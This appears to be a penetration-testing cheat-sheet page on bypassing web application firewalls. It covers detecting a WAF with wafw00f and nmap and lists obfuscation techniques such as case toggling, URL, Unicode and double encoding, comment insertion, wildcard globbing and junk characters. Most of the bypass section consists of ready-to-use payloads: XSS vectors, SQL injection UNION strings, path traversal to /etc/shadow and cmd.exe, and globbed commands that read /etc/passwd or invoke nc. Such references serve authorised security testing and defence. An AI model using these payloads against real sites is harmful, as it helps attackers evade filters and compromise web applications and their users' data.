❯ RedSquad

WAF Bypass

3 min read

Overview

What is a WAF?

A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection, among others. A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks. This method of attack mitigation is usually part of a suite of tools which together create a holistic defense against a range of attack vectors.

Identify the WAF

WAFs use standard ports : 80, 443, 8000, 8008, 8080, and 8088.

wafw00f

wafw00f $target

nmap

# detecting the waf
nmap -p$port --script http-waf-detect $target
 
# fingerprinting the waf
nmap -p$port --script http-waf-fingerprint $target

Bypass techniques

Case Toggling

INFO

Combine upper and lower case characters for creating great payloads.

Examples

# bypassed 
<ScrIpT>confirm()</sCRiPt>
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'

# url example
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL Encoding

INFO

Encode normal payloads with % encoding/URL encoding. You can use Burp. It has an encoder/decoder tool.

Examples

# blocked by waf
<Svg/x=">"/OnLoAD=confirm()//
# bypassed
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
 
# blocked by waf
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
# bypassed
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29
 
# url example
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode

INFO

ASCII characters in Unicode encoding give us great variants for bypassing WAF. Encode entire or part of the payload for obtaining results.

Examples

# basic request
<marquee onstart=prompt()>

# obfuscated
<marquee onstart=\u0070r\u06f\u006dpt()>

# blocked by waf
/?redir=http://google.com

# bypassed
/?redir=http://google。com (Unicode alternative)

# blocked by waf
<marquee loop=1 onfinish=alert()>x

# bypassed
<marquee loop=1 onfinish=alert︵1)>x (Unicode alternative)

# basic request
../../etc/shadow

# obfuscated
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML Representation

INFO

WebApps encode special characters into HTML. Encoding and render them accordingly. Basic bypass cases with HTML encoding numeric and generic.

Examples

# basic request
"><img src=x onerror=confirm()>

# encoded payload
&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; 
# or
&#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62;

Mixed Encoding

INFO

Such rules often tend to filter out a specific type of encoding. Such filters can be bypassed by mixed encoding payloads. Newlines and tabs and further add to obfuscation.

Examples

# obfuscated payload
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

Using comments

INFO

Comments obfuscate standard payload vectors. Different payloads have different ways of obfuscation.

Examples

# blocked by waf
<script>confirm()</script>

# bypassed
<!--><script>confirm/**/()/**/</script>

# blocked by waf
/?id=1+union+select+1,2--

# bypassed
/?id=1+un/**/ion+sel/**/ect+1,2--

# url example
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

Double Encoding

INFO

Web Application Firewall filters tend to encode characters to protect web app. Poorly developed filters (without recursion filters) can be bypassed with double encoding.

# basic request
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\

# obfuscated payload
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

# basic payload
<script>confirm()</script>

# obfuscated payload
%253Cscript%253Econfirm()%253C%252Fscript%253E

Wildcard Obfuscation

INFO

Global patterns are used by various command-line utilities to work with multiple files. We can change them to run system commands.

Examples

# basic request
/bin/cat /etc/passwd

# obfuscated payload
/???/??t /???/??ss??

# used chars
/ ? t s

# basic request
/bin/nc 127.0.0.1 443

# obfuscated payload
/???/n? 2130706433 443

# used chars
/ ? n [0-9]

Junk Characters

INFO

Simple payloads get filtered out easily by WAF. Adding some junk chars helps avoid detection (only specific cases ). This technique often helps in confusing regex-based firewalls.

Examples

# basic request
<script>confirm()</script>

# obfuscated payload
<script>+-+-1-+-+confirm()</script>

# basic request
<BODY onload=confirm()>

# obfuscated payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

# basic request
<a href=javascript;alert()>ClickMe

# bypassed technique
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

More

More | WAF Bypass Techniques

PortSwigger | WAF Bypass with BApp

YesWeHack | WAF Bypass